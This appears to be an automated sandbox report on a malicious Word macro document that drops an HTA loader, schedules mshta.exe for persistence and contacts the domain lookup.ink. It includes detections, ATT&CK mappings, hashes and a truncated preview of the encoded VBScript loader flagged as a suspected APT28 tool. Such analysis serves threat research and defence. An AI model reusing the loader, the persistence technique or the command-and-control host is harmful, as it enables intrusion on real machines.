Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function kokokokoko, API Open("C:\Users\user\AppData\Local\Temp\RoYAd85faz.doc.doc"), Name: kokokokoko
Source: RoYAd85faz.doc, Stream path 'VBA/ThisDocument': found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, found possibly 'ActiveDocument.Name' functions activedocument.name, Name: documeNt_opEn
Source: ~WRD0000.tmp.0.dr, Stream path 'VBA/ThisDocument': found possibly 'ActiveDocument.Name' functions activedocument.name
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DB3000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW:
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWf
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83D80000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Process information queried: ProcessInformation
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the match count the report shows for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Scripting (42); Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution (2); Scheduled Task/Job; At; Cron
Persistence: Browser Extensions (1); Scripting (42); DLL Side-Loading (1); Login Hook
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook
Defense Evasion: Masquerading (1); Process Injection (1); DLL Side-Loading (1); Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery (11); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (4)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Email Collection (1); Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1); Steganography; Protocol Impersonation
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Source | Detection | Scanner | Label
RoYAd85faz.doc | 44% | Virustotal |
RoYAd85faz.doc | 34% | ReversingLabs | Script-Macro.Trojan.MacrosBomber
RoYAd85faz.doc | 100% | Avira | W2000M/AVI.Obfuscated.ldxun
RoYAd85faz.doc | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\~WRD0001.tmp | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://lookup.ink/match.phps | 0% | Avira URL Cloud | safe
http://lookup.ink | 0% | Avira URL Cloud | safe
http://lookup.ink/match.php=8 | 0% | Avira URL Cloud | safe
http://lookup.ink/ | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.phpV | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpOnly | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpL | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.phpy | 0% | Avira URL Cloud | safe
http://lookup.inktT | 0% | Avira URL Cloud | safe
http://lookup.ink/match.php-11CE-8C82-00AA004BA90B | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpj | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.php | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.php-B | 0% | Avira URL Cloud | safe
http://lookup.in | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.phpC | 0% | Avira URL Cloud | safe
http://lookup.ink/match.php$/ | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpMp | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpA | 0% | Avira URL Cloud | safe
http://lookup.ink/match.phpy | 0% | Avira URL Cloud | safe
http://lookup.ink/match.php | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.phpH | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.php- | 0% | Avira URL Cloud | safe
http://lookup.ink/lookup.phpN | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
lookup.ink | 104.21.84.174 | true | true | | unknown
browser.events.data.msn.cn | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://lookup.ink | mshta.exe, 00000009.00000002.2898991106.0000027C81A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC983000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.php=8 | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phpOnly | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phps | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpV | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phpL | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/ | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.inktT | mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpy | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.php-11CE-8C82-00AA004BA90B | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phpj | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.php | mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2317903271.0000027C81A38000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.in | mshta.exe, 00000009.00000003.2581750842.0000027C81A2E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.php-B | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phpA | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.php$/ | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.php | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2901755666.0000027C83475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2581783335.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpC | mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpc | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://lookup.ink/match.phpy | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/match.phpMp | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpH | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.phpN | mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lookup.ink/lookup.php- | mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.84.174 | lookup.ink | United States | | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590274
Start date and time: 2025-01-13 21:33:57 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RoYAd85faz.doc (renamed because original name is a hash value)
Original Sample Name: ab5685ebf439f61c554977df1e1cd0c3.doc
Detection: MAL
Classification: mal100.expl.evad.winDOC@5/12@2/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.76.144, 52.113.194.132, 20.189.173.3, 95.100.110.74, 95.100.110.77, 2.20.245.216, 2.20.245.225, 2.23.240.50, 52.109.68.129, 52.109.32.39, 52.109.32.38, 52.109.32.46, 52.109.32.47, 52.111.236.35, 52.111.236.34, 52.111.236.32, 52.111.236.33, 52.182.143.215, 40.126.32.72, 20.109.210.53, 40.126.24.83
• Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, mobile.events.data.microsoft.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, wu-b-net.trafficmanager.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, e40491.dscg.akamaiedge.net, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, nleditor.osi.office.net, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, owamail.public.cdn.office.net.edgekey.net.globalredir.akadns.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, neu-azsc-000.odc.officeapps.live.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
15:37:33 | API Interceptor | 787x Sleep call for process: mshta.exe modified
21:37:31 | Task Scheduler | Run new task: Dispatch path: C:\Windows\System32\mshta.exe s>C:\Users\user\AppData\Local\Lookup\Dispatch
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.84.174 | https://54y.beribla.com/40OSwsn/ | malicious | HTMLPhisher |
104.21.84.174 | https://onlineguesfix.com/MbC5pb2JAcHJvbW9zdGFyLml0 | malicious | HtmlDropper, HTMLPhisher |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | 40#U0433.doc | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 3.19.1+SetupWIService.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | JUbmpeT.exe | malicious | Vidar | 199.232.210.172
bg.microsoft.map.fastly.net | Invoice and packing list.exe | malicious | FormBook, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | AstralprivateDLL.exe.bin.exe | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT | 199.232.210.172
bg.microsoft.map.fastly.net | documents.exe | malicious | Remcos | 199.232.210.172
bg.microsoft.map.fastly.net | YYYY-NNN AUDIT DETAIL REPORT .docx | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 1972921391166218927.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | 29522576223272839.js | malicious | Strela Downloader | 199.232.214.172

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://www.google.com/amp/url.rw/6r6ns | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | EFT_Payment_Notification_Warriorsheart.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | 3e31414a-0c65-4866-9783-41979ca0d50e.eml | malicious | Unknown | 104.18.68.40
CLOUDFLARENETUS | https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT | malicious | HTMLPhisher | 104.18.95.41
CLOUDFLARENETUS | https://my.hy.ly/mktg/t/GQsngPhaoucFiqrpU/lRY60wG3ZRMjl/DrGolE1Q0aGno?eid=1816099335002400526&cid=1819527474349278460 | malicious | Unknown | 162.247.243.29
CLOUDFLARENETUS | https://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.cl | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://maya-lopez.filemail.com/t/XhcWEjoR | malicious | Unknown | 104.21.112.1
CLOUDFLARENETUS | Handler.exe | malicious | DanaBot, Vidar | 172.64.41.3
CLOUDFLARENETUS | http://grastoonm3vides.com | malicious | Unknown | 104.21.112.1
CLOUDFLARENETUS | https://h3.errantrefrainundocked.shop/riii1.mid | malicious | Unknown | 104.26.10.53
              No context
              No context
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):3442
              Entropy (8bit):5.634913051750585
              Encrypted:false
              SSDEEP:48:mm4eQ47qIOn6gm1tkXep8YFSAUY29IFR0X3J9wAfWoOw6jRz1EMdX7+Juu6mx:meQmdgmXl8wS9IXu3zwAzG1X6JuK
              MD5:8E4E95301EA6335A16A30ACEEE50A254
              SHA1:C677881DEFDC1F405DF8418E0FD9C83B119A0A7D
              SHA-256:BA687C26C45588673834075F894AB4A10D92C336C934F9695A3916334270BA91
              SHA-512:64D04C856E8921B92F980CAF650CCD187CC61B51A09EDA000F52597E054C28FC39A40C28EB0B36FE458137F33B32C6A91A5C3289D857C4CD699A04D2BAEB68C5
              Malicious:false
              Yara Hits:
              • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: C:\Users\user\AppData\Local\Lookup\Dispatch, Author: Sekoia.io
              Reputation:low
              Preview:<HEAD><HTA:APPLICATION ID="matchpower" APPLICATIONNAME="matchpower" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no" BORDER="none" SINGLEINSTANCE="yes"></HEAD><span id=lookupspan>loading...</span><script Language="VBScript.Encode" defer>..#@~^NAwAAA==6.P3MDKDP"+k;:.PH+XY@#@&Skx9GhcD+kr"+:W,!S!@#@&SkUNKARsW-n:WPR+Z!T~ +Z!T@#@&wEx1YbGx,Yn:a`4b@#@&r.~2MDWM~]+kEs+~1naD@#@&dGr:,lSr@#@&doGMPrP{~8PPKPd+xvt*@#@&il~',l~',ZtMcJLCJ,'~HbNvtSkS+*#@#@&irP{Pr~3PF@#@&i1n6D@#@&dO.:aP',l@#@&2.N~s!x^ObWx@#@&Y.6Y,x~Y.:a`EF1*G&3*ATf2bq.Wb*$+2c{vy+w&{8v82c2*Oq!8cT*+!T98ZFW*b2Acy*XvF&Z*.*qf;*{ F*&2 q98s*f*zc1G;fyG1yF+s&ycz+!lf*&+,+{lfc8+vl2 F*fFRFG!qc+flG9FyX*l +fyvF1XGG+!wq8F)Z*lc*~ FqAysT y q$8Fc+XGZ!FW*)FR!; TF)Xl&f*;X*Z*q/lv*{{wFf!8T~ *l!Wb!yF8X2FZf Wcf$y%Fy*b2cc8XXvOcRF0FTf~c{&+q&+ZX{lv*)XFF0Fz*Gc.+FyvFO*2{!2sfA2bqqls*F+FWG lT{G+cl*1F*XFF$FZX*l&f9y*FfXO qFZf;cfZcWs*F 8X*y*T*y*T$l,!~q%l*!RXXcl A *F)*~&1*2*,+A{02 cqfF*X lT+ q8Z8fcZFR*blFqbWGfoy&F+*A2scWX) ZF8F
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):870
              Entropy (8bit):2.7216982607773264
              Encrypted:false
              SSDEEP:24:BrIZatKVUr0quyFLdpeXKA30Ei+rYyPjiI8xpu620:9fCUYqugdpeXTpYyPjiI8xpu65
              MD5:FDB7BDE9525D6ABEE90D0348A0308F3B
              SHA1:87AE19B8952AB8C8BB8FE2109D63D09E7441413E
              SHA-256:65DEFF9C42E47C31CA837327A695173DD29921F8CC5FC7D6923DBD617D4A8CA2
              SHA-512:F683B174074DC2480BD601D4BD7D30A87F35CF5AB03620A9CD3A6B0A32FB728D27DF3331F6A4887C0E5D1263B1CAE6678E4FA784243674E6508A278AD61BFFEC
              Malicious:false
              Reputation:low
              Preview:6.3.6.4.3.3.4.,.7.7.8.7.0.2.2.2.4.,.1.0.3.4.5.0.2.0.,.3.7.4.6.3.7.6.,.1.0.6.9.5.5.3.,.2.6.0.1.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.5.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.3.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.5.,.1.2.2.3.4.3.4.,.7.7.8.7.0.2.2.3.4.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.1.2.2.0.7.7.9.,.;.1.6.5.7.4.5.3.,.1.6.5.7.4.5.2.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.3.0.1.2.3.4.6.6.,.3.0.1.5.3.7.2.1.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.1.0.6.9.5.3.3.,.1.0.3.4.5.0.2.1.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.7.0.4.1.0.8.,.1.4.6.1.9.5.3.,.3.2.9.4.5.8.8.0.3.,.1.0.0.1.,.1.5.6.1.9.5.6.,.1.0.2.3.6.3.8.,.2.4.5.2.3.8.7.,.1.0.0.9.,.5.6.4.1.6.8.7.,.7.7.8.7.0.2.2.2.7.,.8.9.8.9.8.9.8.9.8.,.3.1.9.0.0.0.0.0.,.3.2.0.5.9.2.7.6.7.,.2.4.5.2.3.8.8.,.2.1.0.0.9.4.0.,.3.1.4.1.5.9.0.0.,.
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:true
              Reputation:low
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel
